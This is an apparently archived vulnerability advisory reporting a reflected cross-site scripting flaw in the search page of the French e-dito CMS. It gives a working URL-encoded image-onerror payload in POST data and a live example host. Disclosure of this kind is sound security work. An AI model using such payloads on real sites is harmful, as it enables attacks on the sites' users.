e-dito CMS reflected XSS

2016.08.28
fr Implosion (FR) fr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

---------------------------------------------------------------------- [Description] #Exploit title: e-dito CMS reflected XSS #Exploit author: Implosion #Date: 28/08/2016 #Dorks: N/A #Tested on: Firefox ---------------------------------------------------------------------- [Vulnerability] #This XSS is on the search engine here: /search/index.php #POST DATA : phpMyAdmin=67f0f3645c2ba682499a4e4d47523392&phpMyAdmin=2QfN1PDOiWFbrApm8ZrN-5X5DF6&keywords=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%3C%22&x=26&y=14 ---------------------------------------------------------------------- [Description] e-dito est un logiciel de gestionnaire de contenus (CMS) professionnel, performant mais trés simple d'utilisation. Avec tous nos plans, le logiciel est installé et configuré par notre équipe. Vous entrez simplement vous même vos textes, photos, vidéos en quelques minutes puis gérez votre site sans connaissances techniques ! ---------------------------------------------------------------------- [Example] #http://ca.e-dito.net//search/index.php ---------------------------------------------------------------------- #Discovered By Implosion #Thanks to: NbSp_ ----------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top